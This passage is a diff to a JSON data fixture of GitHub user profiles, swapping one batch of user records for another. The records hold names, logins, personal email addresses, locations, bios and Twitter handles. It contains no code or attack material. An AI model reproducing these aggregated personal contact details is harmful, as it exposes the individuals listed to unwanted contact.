"pk": 7320, "fields": { - "nest_created_at": "2024-09-12T00:33:06.195Z", - "nest_updated_at": "2024-09-12T00:33:06.195Z", - "name": "Mike@Savient", - "login": "mike-reynolds-savient", + "nest_created_at": "2024-09-22T08:43:46.991Z", + "nest_updated_at": "2024-09-22T19:28:30.420Z", + "name": "Riley W.", + "login": "rileyw", + "email": "riley.wills@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/23965?v=4", + "company": "", + "location": "Abilene, Texas", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 11, + "public_gists_count": 7, + "public_repositories_count": 26, + "created_at": "2008-09-10T13:52:31Z", + "updated_at": "2024-08-02T21:07:16Z", + "node_id": "MDQ6VXNlcjIzOTY1", + "bio": "", + "is_hireable": false, + "twitter_username": "rileywills" + } +}, +{ + "model": "github.user", + "pk": 7321, + "fields": { + "nest_created_at": "2024-09-22T08:43:47.302Z", + "nest_updated_at": "2024-09-22T19:28:30.736Z", + "name": "Robert Theis", + "login": "rmtheis", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/84866450?v=4", - "company": "Savient UK Ltd", - "location": "Cheltenham, UK", + "avatar_url": "https://avatars.githubusercontent.com/u/943135?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-05-26T16:39:24Z", - "updated_at": "2024-02-18T10:40:27Z", - "node_id": "MDQ6VXNlcjg0ODY2NDUw", + "followers_count": 343, + "public_gists_count": 6, + "public_repositories_count": 6, + "created_at": "2011-07-27T22:26:19Z", + "updated_at": "2024-09-12T12:15:34Z", + "node_id": "MDQ6VXNlcjk0MzEzNQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410578,24 +668952,24 @@ }, { "model": "github.user", - "pk": 2014, + "pk": 7322, "fields": { - "nest_created_at": "2024-09-12T00:33:07.847Z", - "nest_updated_at": "2024-09-12T00:33:07.847Z", - "name": "Raghul Vishnu", - "login": "raghulvishnudhinesh", + "nest_created_at": "2024-09-22T08:43:47.615Z", + "nest_updated_at": "2024-09-22T19:28:31.050Z", + "name": "Robert Turner", + "login": "rturner-edjuster", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/101252399?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/33302790?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-03-09T09:32:12Z", - "updated_at": "2023-10-04T08:35:37Z", - "node_id": "U_kgDOBgj9Lw", + "public_repositories_count": 6, + "created_at": "2017-11-02T02:03:29Z", + "updated_at": "2024-09-09T14:45:30Z", + "node_id": "MDQ6VXNlcjMzMzAyNzkw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410603,49 +668977,49 @@ }, { "model": "github.user", - "pk": 2015, + "pk": 7323, "fields": { - "nest_created_at": "2024-09-12T00:33:09.452Z", - "nest_updated_at": "2024-09-12T00:33:09.452Z", - "name": "Jakob Nohe", - "login": "foxylion", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2699280?v=4", - "company": "itdesign GmbH (@itdesign)", - "location": "Germany", + "nest_created_at": "2024-09-22T08:43:48.239Z", + "nest_updated_at": "2024-09-22T19:28:31.680Z", + "name": "djBo", + "login": "djBo", + "email": "rory.slegtenhorst@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/931916?v=4", + "company": "", + "location": "Netherlands", "collaborators_count": 0, - "following_count": 21, - "followers_count": 41, - "public_gists_count": 6, - "public_repositories_count": 32, - "created_at": "2012-11-01T14:08:05Z", - "updated_at": "2024-09-06T11:23:51Z", - "node_id": "MDQ6VXNlcjI2OTkyODA=", - "bio": "Working as Lead Cloud Architect at @itdesign. Being a scout in my spare time.", + "following_count": 3, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 26, + "created_at": "2011-07-22T07:04:46Z", + "updated_at": "2022-12-23T18:22:20Z", + "node_id": "MDQ6VXNlcjkzMTkxNg==", + "bio": "", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2016, + "pk": 7324, "fields": { - "nest_created_at": "2024-09-12T00:33:11.460Z", - "nest_updated_at": "2024-09-12T00:33:11.460Z", + "nest_created_at": "2024-09-22T08:43:48.564Z", + "nest_updated_at": "2024-09-22T19:28:31.995Z", "name": "", - "login": "bhaskar-s-019", + "login": "rperamw", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9975934?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/56272217?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2014-11-27T11:34:59Z", - "updated_at": "2023-12-26T13:01:52Z", - "node_id": "MDQ6VXNlcjk5NzU5MzQ=", + "public_repositories_count": 0, + "created_at": "2019-10-07T17:49:10Z", + "updated_at": "2024-02-03T01:22:38Z", + "node_id": "MDQ6VXNlcjU2MjcyMjE3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410653,149 +669027,174 @@ }, { "model": "github.user", - "pk": 2017, + "pk": 7325, "fields": { - "nest_created_at": "2024-09-12T00:33:14.315Z", - "nest_updated_at": "2024-09-12T00:33:14.315Z", - "name": "", - "login": "BenniG82", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6051664?v=4", + "nest_created_at": "2024-09-22T08:43:48.881Z", + "nest_updated_at": "2024-09-22T19:28:32.311Z", + "name": "Rémi Alvergnat", + "login": "Toilal", + "email": "toilal.dev@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1165758?v=4", "company": "", - "location": "", + "location": "Orléans, France", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 31, + "followers_count": 97, + "public_gists_count": 11, + "public_repositories_count": 255, + "created_at": "2011-11-01T20:06:18Z", + "updated_at": "2024-08-21T08:24:46Z", + "node_id": "MDQ6VXNlcjExNjU3NTg=", + "bio": "Software Developer", + "is_hireable": false, + "twitter_username": "Toilal" + } +}, +{ + "model": "github.user", + "pk": 7326, + "fields": { + "nest_created_at": "2024-09-22T08:43:49.205Z", + "nest_updated_at": "2024-09-22T19:28:32.623Z", + "name": "SPACELAN", + "login": "spacelan", + "email": "yuhang.lan@outlook.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3382212?v=4", + "company": "", + "location": "Beijing", + "collaborators_count": 0, + "following_count": 30, + "followers_count": 120, "public_gists_count": 2, - "public_repositories_count": 24, - "created_at": "2013-11-27T16:20:36Z", - "updated_at": "2024-07-21T13:50:11Z", - "node_id": "MDQ6VXNlcjYwNTE2NjQ=", - "bio": "", + "public_repositories_count": 91, + "created_at": "2013-01-25T14:30:25Z", + "updated_at": "2024-09-09T14:21:00Z", + "node_id": "MDQ6VXNlcjMzODIyMTI=", + "bio": "Biu~", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2018, + "pk": 7327, "fields": { - "nest_created_at": "2024-09-12T00:33:17.174Z", - "nest_updated_at": "2024-09-12T00:33:17.174Z", - "name": "", - "login": "githubuserVenkat", + "nest_created_at": "2024-09-22T08:43:49.521Z", + "nest_updated_at": "2024-09-22T19:28:32.944Z", + "name": "Salman", + "login": "salmansharifov", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/155939959?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/52676032?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 5, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2024-01-08T05:03:39Z", - "updated_at": "2024-08-16T07:38:38Z", - "node_id": "U_kgDOCUt0dw", + "public_repositories_count": 24, + "created_at": "2019-07-08T18:52:30Z", + "updated_at": "2024-09-13T19:38:31Z", + "node_id": "MDQ6VXNlcjUyNjc2MDMy", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2019, + "pk": 7328, "fields": { - "nest_created_at": "2024-09-12T00:33:18.781Z", - "nest_updated_at": "2024-09-12T00:33:18.781Z", - "name": "Mustapha MANSOUR", - "login": "mumans", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12114835?v=4", - "company": "Neoxia", - "location": "Paris", + "nest_created_at": "2024-09-22T08:43:50.160Z", + "nest_updated_at": "2024-09-22T19:28:33.597Z", + "name": "Solomon", + "login": "Serubin", + "email": "hello@serubin.net", + "avatar_url": "https://avatars.githubusercontent.com/u/1234465?v=4", + "company": "@lacework", + "location": "Washington DC", "collaborators_count": 0, - "following_count": 20, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2015-04-25T18:10:28Z", - "updated_at": "2024-09-10T12:27:51Z", - "node_id": "MDQ6VXNlcjEyMTE0ODM1", - "bio": "", - "is_hireable": false, + "following_count": 31, + "followers_count": 39, + "public_gists_count": 9, + "public_repositories_count": 96, + "created_at": "2011-12-01T20:21:38Z", + "updated_at": "2024-09-21T20:31:02Z", + "node_id": "MDQ6VXNlcjEyMzQ0NjU=", + "bio": "\r\n Open Source Fanatic. Engineering Leader. Avid Cyclist\r\n", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2020, + "pk": 7329, "fields": { - "nest_created_at": "2024-09-12T00:33:21.212Z", - "nest_updated_at": "2024-09-12T00:33:21.212Z", - "name": "Alec James", - "login": "alecjames", + "nest_created_at": "2024-09-22T08:43:50.504Z", + "nest_updated_at": "2024-09-22T19:28:33.927Z", + "name": "Stefaan Dutry", + "login": "sdutry", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26629256?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7937324?v=4", "company": "", - "location": "UK", + "location": "Belgium", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 0, + "followers_count": 10, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2017-03-23T15:14:35Z", - "updated_at": "2024-06-05T14:46:59Z", - "node_id": "MDQ6VXNlcjI2NjI5MjU2", - "bio": "Electronics, software, mechatronics engineer.", + "public_repositories_count": 10, + "created_at": "2014-06-19T20:36:07Z", + "updated_at": "2024-08-23T11:31:41Z", + "node_id": "MDQ6VXNlcjc5MzczMjQ=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2021, + "pk": 7330, "fields": { - "nest_created_at": "2024-09-12T00:33:23.588Z", - "nest_updated_at": "2024-09-12T00:33:23.588Z", - "name": "Dan McLaughlin", - "login": "danshome", - "email": "dan@danshome.net", - "avatar_url": "https://avatars.githubusercontent.com/u/17056009?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:43:51.149Z", + "nest_updated_at": "2024-09-22T19:28:34.551Z", + "name": "Stephen Kitt", + "login": "skitt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2128935?v=4", + "company": "@redhatofficial", + "location": "Lyon, France", "collaborators_count": 0, - "following_count": 5, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 22, - "created_at": "2016-02-03T23:58:57Z", - "updated_at": "2024-08-26T13:25:11Z", - "node_id": "MDQ6VXNlcjE3MDU2MDA5", + "following_count": 1, + "followers_count": 103, + "public_gists_count": 2, + "public_repositories_count": 148, + "created_at": "2012-08-10T09:49:21Z", + "updated_at": "2024-09-13T11:46:03Z", + "node_id": "MDQ6VXNlcjIxMjg5MzU=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "thekittster" } }, { "model": "github.user", - "pk": 2022, + "pk": 7331, "fields": { - "nest_created_at": "2024-09-12T00:33:24.852Z", - "nest_updated_at": "2024-09-12T00:33:24.852Z", - "name": "", - "login": "DomZZ", + "nest_created_at": "2024-09-22T08:43:51.470Z", + "nest_updated_at": "2024-09-22T19:28:34.877Z", + "name": "Stig Døssing", + "login": "srdo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/35232165?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4324588?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2018-01-08T16:55:44Z", - "updated_at": "2024-06-17T20:34:29Z", - "node_id": "MDQ6VXNlcjM1MjMyMTY1", + "following_count": 3, + "followers_count": 13, + "public_gists_count": 6, + "public_repositories_count": 35, + "created_at": "2013-05-02T18:25:23Z", + "updated_at": "2023-12-15T22:12:41Z", + "node_id": "MDQ6VXNlcjQzMjQ1ODg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410803,49 +669202,49 @@ }, { "model": "github.user", - "pk": 2023, + "pk": 7332, "fields": { - "nest_created_at": "2024-09-12T00:33:26.105Z", - "nest_updated_at": "2024-09-12T00:34:17.963Z", - "name": "Nitin Chavan", - "login": "a20nitin", + "nest_created_at": "2024-09-22T08:43:51.787Z", + "nest_updated_at": "2024-09-22T19:28:35.194Z", + "name": "Suhan Dharmasuriya", + "login": "suhand", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/123905569?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5634722?v=4", + "company": "WSO2, Inc.", + "location": "Colombo, Sri Lanka", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 11, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2023-01-29T21:43:48Z", - "updated_at": "2024-03-19T13:00:38Z", - "node_id": "U_kgDOB2KmIQ", - "bio": "", + "public_repositories_count": 54, + "created_at": "2013-10-08T04:11:36Z", + "updated_at": "2024-06-06T09:29:40Z", + "node_id": "MDQ6VXNlcjU2MzQ3MjI=", + "bio": "Driving the internal digital transformation process of finance, sales and engineering domains.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2024, + "pk": 7333, "fields": { - "nest_created_at": "2024-09-12T00:33:28.555Z", - "nest_updated_at": "2024-09-12T00:33:28.555Z", - "name": "", - "login": "kiryl0277", + "nest_created_at": "2024-09-22T08:43:52.132Z", + "nest_updated_at": "2024-09-22T19:28:35.509Z", + "name": "Marco Meyer", + "login": "reyem", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/109075027?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5948347?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-07-11T10:31:44Z", - "updated_at": "2024-01-22T13:30:01Z", - "node_id": "U_kgDOBoBaUw", + "public_repositories_count": 8, + "created_at": "2013-11-15T13:50:30Z", + "updated_at": "2024-08-08T13:51:42Z", + "node_id": "MDQ6VXNlcjU5NDgzNDc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410853,49 +669252,49 @@ }, { "model": "github.user", - "pk": 2025, + "pk": 7334, "fields": { - "nest_created_at": "2024-09-12T00:33:29.770Z", - "nest_updated_at": "2024-09-12T00:33:31.768Z", - "name": "", - "login": "proo4509", + "nest_created_at": "2024-09-22T08:43:52.447Z", + "nest_updated_at": "2024-09-22T19:42:02.650Z", + "name": "Matt", + "login": "namloc2001", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/31039083?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/30868661?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2017-08-15T13:41:12Z", - "updated_at": "2024-08-19T14:46:48Z", - "node_id": "MDQ6VXNlcjMxMDM5MDgz", - "bio": "", + "public_repositories_count": 22, + "created_at": "2017-08-09T13:51:02Z", + "updated_at": "2022-02-18T15:45:39Z", + "node_id": "MDQ6VXNlcjMwODY4NjYx", + "bio": "Interested in DevSecOps, containers, Kubernetes, OpenShift and security", "is_hireable": false, - "twitter_username": "" + "twitter_username": "mattcolman" } }, { "model": "github.user", - "pk": 2026, + "pk": 7335, "fields": { - "nest_created_at": "2024-09-12T00:33:33.389Z", - "nest_updated_at": "2024-09-12T00:33:33.389Z", - "name": "", - "login": "zdani7", + "nest_created_at": "2024-09-22T08:43:53.083Z", + "nest_updated_at": "2024-09-22T19:28:36.445Z", + "name": "Matt Nelson", + "login": "mattnelson", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23515369?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1894657?v=4", + "company": "@oracle", + "location": "Kansas City, MO", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2016-11-17T03:52:21Z", - "updated_at": "2023-09-26T18:56:34Z", - "node_id": "MDQ6VXNlcjIzNTE1MzY5", + "following_count": 23, + "followers_count": 19, + "public_gists_count": 2, + "public_repositories_count": 52, + "created_at": "2012-06-26T15:16:42Z", + "updated_at": "2024-08-15T16:41:26Z", + "node_id": "MDQ6VXNlcjE4OTQ2NTc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410903,24 +669302,24 @@ }, { "model": "github.user", - "pk": 2027, + "pk": 7336, "fields": { - "nest_created_at": "2024-09-12T00:33:34.694Z", - "nest_updated_at": "2024-09-12T00:33:34.694Z", - "name": "", - "login": "rahulsyal92", + "nest_created_at": "2024-09-22T08:43:53.396Z", + "nest_updated_at": "2024-09-22T19:28:36.755Z", + "name": "Max Gipson", + "login": "maxgip", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/68044738?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/12716705?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2020-07-09T04:18:20Z", - "updated_at": "2024-06-28T06:07:56Z", - "node_id": "MDQ6VXNlcjY4MDQ0NzM4", + "public_repositories_count": 4, + "created_at": "2015-06-02T15:29:43Z", + "updated_at": "2024-06-21T20:51:01Z", + "node_id": "MDQ6VXNlcjEyNzE2NzA1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410928,24 +669327,24 @@ }, { "model": "github.user", - "pk": 2028, + "pk": 7337, "fields": { - "nest_created_at": "2024-09-12T00:33:35.494Z", - "nest_updated_at": "2024-09-12T00:33:35.494Z", - "name": "Alejandro Gomez Canal", - "login": "alexagc", - "email": "alexcanal@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/16854770?v=4", + "nest_created_at": "2024-09-22T08:43:53.717Z", + "nest_updated_at": "2024-09-22T19:28:37.088Z", + "name": "Michał Wieczorek", + "login": "mwieczorek", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7051680?v=4", "company": "", - "location": "", + "location": "Poland, Katowice", "collaborators_count": 0, - "following_count": 7, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2016-01-23T17:18:10Z", - "updated_at": "2024-09-01T11:32:10Z", - "node_id": "MDQ6VXNlcjE2ODU0Nzcw", + "following_count": 0, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 3, + "created_at": "2014-03-24T20:37:03Z", + "updated_at": "2024-09-06T06:40:29Z", + "node_id": "MDQ6VXNlcjcwNTE2ODA=", "bio": "", "is_hireable": true, "twitter_username": "" @@ -410953,24 +669352,24 @@ }, { "model": "github.user", - "pk": 2029, + "pk": 7338, "fields": { - "nest_created_at": "2024-09-12T00:33:36.718Z", - "nest_updated_at": "2024-09-12T00:33:36.718Z", - "name": "", - "login": "rocenpe", + "nest_created_at": "2024-09-22T08:43:54.047Z", + "nest_updated_at": "2024-09-22T19:28:37.407Z", + "name": "Miguel Angel Cabrera Moya", + "login": "madmac2501", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13677083?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1039475?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2015-08-06T10:55:45Z", - "updated_at": "2024-04-04T08:09:01Z", - "node_id": "MDQ6VXNlcjEzNjc3MDgz", + "public_repositories_count": 9, + "created_at": "2011-09-09T19:44:19Z", + "updated_at": "2024-01-28T13:29:16Z", + "node_id": "MDQ6VXNlcjEwMzk0NzU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -410978,24 +669377,49 @@ }, { "model": "github.user", - "pk": 2030, + "pk": 7339, "fields": { - "nest_created_at": "2024-09-12T00:33:37.950Z", - "nest_updated_at": "2024-09-12T00:33:37.950Z", - "name": "", - "login": "c24-jmiser", + "nest_created_at": "2024-09-22T08:43:54.369Z", + "nest_updated_at": "2024-09-22T19:28:37.724Z", + "name": "Mirko Sertic", + "login": "mirkosertic", + "email": "mirko@mirkosertic.de", + "avatar_url": "https://avatars.githubusercontent.com/u/2124663?v=4", + "company": "Systemprogrammierung Mirko Sertic", + "location": "Münster / Germany", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 118, + "public_gists_count": 8, + "public_repositories_count": 43, + "created_at": "2012-08-09T17:02:55Z", + "updated_at": "2024-07-13T18:16:11Z", + "node_id": "MDQ6VXNlcjIxMjQ2NjM=", + "bio": "#Java #Coder, #Systemarchitect and #Requirementsengineer ", + "is_hireable": false, + "twitter_username": "mirkosertic" + } +}, +{ + "model": "github.user", + "pk": 7340, + "fields": { + "nest_created_at": "2024-09-22T08:43:54.717Z", + "nest_updated_at": "2024-09-22T19:28:38.039Z", + "name": "Monsma", + "login": "jmonsma", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/98899978?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6428412?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2022-02-02T15:44:33Z", - "updated_at": "2024-04-04T20:14:10Z", - "node_id": "U_kgDOBeUYCg", + "following_count": 1, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 16, + "created_at": "2014-01-17T10:05:14Z", + "updated_at": "2024-09-20T11:31:34Z", + "node_id": "MDQ6VXNlcjY0Mjg0MTI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411003,224 +669427,249 @@ }, { "model": "github.user", - "pk": 2031, + "pk": 7341, "fields": { - "nest_created_at": "2024-09-12T00:33:39.212Z", - "nest_updated_at": "2024-09-12T00:33:39.212Z", - "name": "", - "login": "Dhanxi", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/157735796?v=4", + "nest_created_at": "2024-09-22T08:43:55.066Z", + "nest_updated_at": "2024-09-22T19:28:38.350Z", + "name": "Nick Ebbitt", + "login": "nickebbitt", + "email": "nickebbitt@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5111725?v=4", "company": "", - "location": "", + "location": "Manchester, UK", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-01-25T17:38:48Z", - "updated_at": "2024-01-30T21:40:41Z", - "node_id": "U_kgDOCWbbdA", + "following_count": 6, + "followers_count": 21, + "public_gists_count": 2, + "public_repositories_count": 51, + "created_at": "2013-07-29T09:08:08Z", + "updated_at": "2024-09-09T20:43:23Z", + "node_id": "MDQ6VXNlcjUxMTE3MjU=", "bio": "", "is_hireable": false, + "twitter_username": "nickebbitt" + } +}, +{ + "model": "github.user", + "pk": 7342, + "fields": { + "nest_created_at": "2024-09-22T08:43:55.384Z", + "nest_updated_at": "2024-09-22T19:28:38.657Z", + "name": "Niklas Fischer", + "login": "niklasfi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/299626?v=4", + "company": "", + "location": "Essen, Germany", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 8, + "public_gists_count": 60, + "public_repositories_count": 39, + "created_at": "2010-06-08T08:04:52Z", + "updated_at": "2024-08-27T10:18:11Z", + "node_id": "MDQ6VXNlcjI5OTYyNg==", + "bio": "", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2032, + "pk": 7343, "fields": { - "nest_created_at": "2024-09-12T00:33:40.418Z", - "nest_updated_at": "2024-09-12T00:33:40.418Z", - "name": "", - "login": "mertartanbtc", + "nest_created_at": "2024-09-22T08:43:56.068Z", + "nest_updated_at": "2024-09-22T19:28:39.295Z", + "name": "Nima Yahyazadeh", + "login": "yznima", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/135612047?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/28398072?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 16, + "followers_count": 9, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-06-05T11:29:05Z", - "updated_at": "2024-06-07T10:55:18Z", - "node_id": "U_kgDOCBVGjw", - "bio": "", + "public_repositories_count": 24, + "created_at": "2017-05-04T15:19:45Z", + "updated_at": "2024-08-23T18:07:42Z", + "node_id": "MDQ6VXNlcjI4Mzk4MDcy", + "bio": "Nima is a Lead Software engineer focused on developing solutions for startups. He has years of experience developing distributed and cloud-native solutions.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2033, + "pk": 7344, "fields": { - "nest_created_at": "2024-09-12T00:33:42.904Z", - "nest_updated_at": "2024-09-12T00:33:42.904Z", - "name": "Błażej Leśny", - "login": "blazeej", + "nest_created_at": "2024-09-22T08:43:56.383Z", + "nest_updated_at": "2024-09-22T19:28:39.606Z", + "name": "Oliver Libutzki", + "login": "OLibutzki", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3501788?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/977893?v=4", "company": "", - "location": "Poznań", + "location": "Kiel, Europe", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 1, - "created_at": "2013-02-07T13:41:39Z", - "updated_at": "2024-08-22T10:36:19Z", - "node_id": "MDQ6VXNlcjM1MDE3ODg=", + "followers_count": 11, + "public_gists_count": 5, + "public_repositories_count": 58, + "created_at": "2011-08-13T14:45:18Z", + "updated_at": "2024-08-29T11:26:31Z", + "node_id": "MDQ6VXNlcjk3Nzg5Mw==", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "OliverLibutzki" } }, { "model": "github.user", - "pk": 2034, + "pk": 7345, "fields": { - "nest_created_at": "2024-09-12T00:33:44.557Z", - "nest_updated_at": "2024-09-16T22:25:13.627Z", - "name": "Yaytay", - "login": "Yaytay", + "nest_created_at": "2024-09-22T08:43:56.699Z", + "nest_updated_at": "2024-09-22T19:28:39.923Z", + "name": "Oliver Lockwood", + "login": "oliverlockwood", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3931112?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6017680?v=4", "company": "", - "location": "Oxfordshire", + "location": "London, UK", "collaborators_count": 0, - "following_count": 1, - "followers_count": 7, - "public_gists_count": 1, - "public_repositories_count": 15, - "created_at": "2013-03-21T12:43:54Z", - "updated_at": "2024-09-12T07:21:14Z", - "node_id": "MDQ6VXNlcjM5MzExMTI=", - "bio": "Jim Talbut has been paid to move bits about for the past 25 years.\r\nI am currently working on microservice architecture and cloud migration for Group GTI.", + "following_count": 4, + "followers_count": 15, + "public_gists_count": 17, + "public_repositories_count": 70, + "created_at": "2013-11-23T13:37:06Z", + "updated_at": "2024-07-25T08:17:50Z", + "node_id": "MDQ6VXNlcjYwMTc2ODA=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2035, + "pk": 7346, "fields": { - "nest_created_at": "2024-09-12T00:33:45.756Z", - "nest_updated_at": "2024-09-12T00:33:45.756Z", - "name": "Daniel Norton", - "login": "dnorton", - "email": "daniel@dnorton.org", - "avatar_url": "https://avatars.githubusercontent.com/u/34991?v=4", - "company": "@Lean-Law-Labs ", - "location": "Charlotte, NC", + "nest_created_at": "2024-09-22T08:43:57.005Z", + "nest_updated_at": "2024-09-22T19:28:40.241Z", + "name": "", + "login": "irrandon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13981266?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 78, - "followers_count": 24, - "public_gists_count": 30, - "public_repositories_count": 28, - "created_at": "2008-11-17T15:13:21Z", - "updated_at": "2024-07-26T19:21:52Z", - "node_id": "MDQ6VXNlcjM0OTkx", - "bio": "Be kind", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2015-08-26T12:28:36Z", + "updated_at": "2024-09-09T12:56:15Z", + "node_id": "MDQ6VXNlcjEzOTgxMjY2", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2036, + "pk": 7347, "fields": { - "nest_created_at": "2024-09-12T00:33:47.335Z", - "nest_updated_at": "2024-09-12T00:33:47.335Z", - "name": "Rafal Kasa", - "login": "rafalkasa", - "email": "rafalkasa@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/19885116?v=4", + "nest_created_at": "2024-09-22T08:43:57.316Z", + "nest_updated_at": "2024-09-22T19:28:40.560Z", + "name": "Philip Graf", + "login": "acanda", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/174978?v=4", "company": "", - "location": "Warsaw / Poland", + "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 26, - "public_gists_count": 2, - "public_repositories_count": 36, - "created_at": "2016-06-12T05:40:04Z", - "updated_at": "2024-08-14T19:14:48Z", - "node_id": 